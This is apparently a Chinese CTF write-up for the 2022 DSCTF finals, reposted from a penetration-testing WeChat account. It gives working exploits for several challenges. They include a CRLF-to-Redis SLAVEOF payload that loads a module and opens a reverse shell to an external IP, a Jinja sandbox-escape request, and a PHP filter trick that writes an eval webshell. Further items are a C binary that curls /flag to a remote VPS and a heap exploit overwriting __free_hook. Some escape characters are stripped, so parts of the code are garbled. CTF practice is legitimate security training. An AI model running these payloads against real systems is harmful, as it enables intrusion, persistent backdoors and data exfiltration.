点击蓝字 · 关注我们
1
ezjava
https://github.com/oblac/jodd-http/issues/9
CRLF打Redis主从复制
exp
import urllib.parse
url = '''http://127.0.0.1:6379/ HTTP/1.1rnHost: 127.0.0.1:6379rnAUTH
enw!BKT_hac*pev9nvjrnSLAVEOF 121.4.124.62 6666rnCONFIG SET dir /tmprnconfig set
dbfilename exp.sornMODULE LOAD /tmp/exp.sornsystem.rev 121.4.124.62 9001rnSLAVEOF
NO ONErnquitrnPOST / '''
print(urllib.parse.quote(url))
2
newweb_new
nghttp http://39.106.156.96:48097/ -v
访问路径405 改成post传参 沙箱逃逸 过滤单双引号 ⽤request
POST /sup3rh1dep4th/?
x1=__class__&x2=__base__&x3=__subclasses__&x4=__getitem__&x5=__init__&x6=__globals__&x7
=__builtins__&x8=eval&x9=__import__("os").popen('cat%20/f*').read() HTTP/2
Host: 39.106.156.96:48097
Content-Length: 241
Content-Type: application/x-www-form-urlencoded
data=()|attr(request.args.x1)|attr(request.args.x2)|attr(request.args.x3)
()|attr(request.args.x4)
(280)|attr(request.args.x5)|attr(request.args.x6)|attr(request.args.x4)
(request.args.x7)|attr(request.args.x4)(request.args.x8)(request.args.x9)
3
safe_script_new
在对象销毁的时候会触发save操作 file_put_contents写⼊⽂件 ⽂件名可控 往上找就是SESSION::__construct。
有过滤 限制了.. 不能相对路径⽬录穿越 同时限制了file:// 以及第⼀字符不能是/ 绕过也很简单 使⽤php伪协议就⾏ 这⾥使⽤了utf7到utf8的转化器
payload。
POST / HTTP/1.1
Host: 39.107.68.209:36319
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101
Firefox/103.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: sessid=php://filter/convert.iconv.utf-7.utf-8/resource=/var/www/html/1.php
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 105
key=%2BADw%3Fphp%20%2BAEA%2Deval%28%2BACQAXw%2DPOST%2BAFs%2D1%2BAF0%29%2BADs%20%20%3F%2
BAD4APQ&value=aaaa
蚁剑连接1.php 根⽬录看到/strat.sh,内容如下:
查看进程是⽤root权限启动的
run.py内容
import subprocess
import re
import os
import time
def get_version(program):
pid = program[1]
try:
exe_path = "/proc/" + pid + "/exe"
program_path = subprocess.check_output(["su","-l",program[0],"-
s",'/bin/bash','-c',f"readlink {exe_path}"], timeout=1).decode('utf-8').strip()
print(program, "/proc/" + pid + "/exe", program_path)
return subprocess.check_output([program_path, '--version'],
timeout=1).decode('utf-8').strip()
except Exception as e:
print(e)
return None
def get_process_list():
try:
process_list = []
raw = subprocess.check_output(['ps', '-ef']).decode('utf-8').strip()
# raw = open("a.txt", "r").read()
lines = raw.split('n')
for line in lines:
if line.startswith('UID'):
continue
data = re.findall(r'^([^x20]+)x20+([^x20]+)x20+([^x20]+)x20+
([^x20]+)x20+([^x20]+)x20+([^x20]+)x20+([^x20]+)x20+(.+?)$', line)
if len(data) > 0:
data = data[0]
else:
continue
print(data, data[-1])
if "java" in data[-1]:
process_list.append(data)
return process_list
except subprocess.CalledProcessError:
return None
if __name__ == '__main__':
while True:
try:
processes = get_process_list()
for process in processes:
get_version(process)
except:
pass
time.sleep(20)
⼤概意思是每隔20秒取含有java的进程,先⽤readlink查看链接信息,然后执⾏<program> –version flag在根⽬录下,那么就写个读/flag后curl发到vps的elf,并且命名为java就能让run.py以root来读flag了 写⼊1.c。
int main(int argc, char* argv[]) {
for(int i = 0; i < 1000; i++){
system("curl http://<vps_ip>:4040/?flag=`cat /flag`");
system("sleep 3");
}
}
接着编译⽣成,-o执⾏程序名为java,然后赋予权限启动
等待⼀下就拿到flag
1
Esc@pE_ASt_Reverge_d
1
tomic
sage⽤筛法分解第⼀个,第⼆个直接gcd
from sage.all import *
from pwn import *
context.log_level='debug'
r=remote('39.106.156.96',36510)
r.recvuntil('Factor ')
n=int(r.recvline().strip()[:-1])
factors=qsieve(n)[0]
p,q=[int(i) for i in factors]
r.sendline(str(p+q))
r.recvuntil(' - ')
n=int(r.recvuntil(' - ')[:-3])
e=int(r.recvuntil(':')[:-1])
p=GCD(n,e)
q=n//p
r.sendline(str(p+q))
r.interactive()
1
gonote_new
#coding:utf-8
import sys
from pwn import *
context.log_level='debug'
#context.arch='amd64'
while True :
# try :
if len(sys.argv)==1 :
io=process('./gonote')
# io=process(['./'],env={'LD_PRELOAD':'./'})
elf=ELF('./gonote')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
ld = ELF('/lib/x86_64-linux-gnu/ld-2.27.so')
pop_rdx_rsi=0x00000000001306d9 #: pop rdx ; pop rsi ; ret
one_gadget = [0x4f2c5,0x4f322,0x10a38c]
else :
io=remote('39.107.82.169',9110)
elf=ELF('./gonote')
libc=ELF('./libc-2.27.so')
pop_rdx_rsi=0x00000000001306d9 #: pop rdx ; pop rsi ; ret
one_gadget = [0x4f2c5,0x4f322,0x10a38c]
def add(a,b,c):
io.sendlineafter('Your choice: ','1')
io.sendlineafter('Index: ',str(a))
io.sendlineafter('Size: ',str(b))
io.sendafter('Content: ',c)
def show(a):
io.sendlineafter('Your choice: ','2')
io.sendlineafter('Index: ',str(a))
def delete(a):
io.sendlineafter('Your choice: ','3')
io.sendlineafter('Index: ',str(a))
add(2,-0xff88,'a')
add(0,0x1f8,'a'*0xf7+'n')
add(1,0x1f8,'a'*0xf7+'n')
add(3,0x1f8,'a'*0xf7+'n')
add(4,0xf8,'/bin/shx00')
add(5,0x1f8,'a'*0xf7+'n')
delete(2)
add(2,-0xff88,'x00'*0x70+p64(0)+p64(0x601))
delete(0)
add(0,0x1f8,'a'*0xf7+'n')
show(1)
libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-96-
0x10
libc.address=libc_base
bin_sh_addr=libc.search('/bin/shx00').next()
system_addr=libc.sym['system']
delete(5)
delete(3)
add(3,0xf8,'a'*0xf7+'n')
add(5,0x188,'a'*0xf8+p64(0x1f8)+p64(libc.sym['__free_hook']))
add(6,0x1f8,'a'*0xf7+'n')
add(7,0x1f8,p64(system_addr))
delete(4)
# success('libc_base:'+hex(libc_base))
# gdb.attach(io)
# pause()
io.interactive()
# except Exception as e:
# io.close()
# continue
# else:
# continue
Tip
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
原文始发于微信公众号(EDI安全):2022 DSCTF决赛wp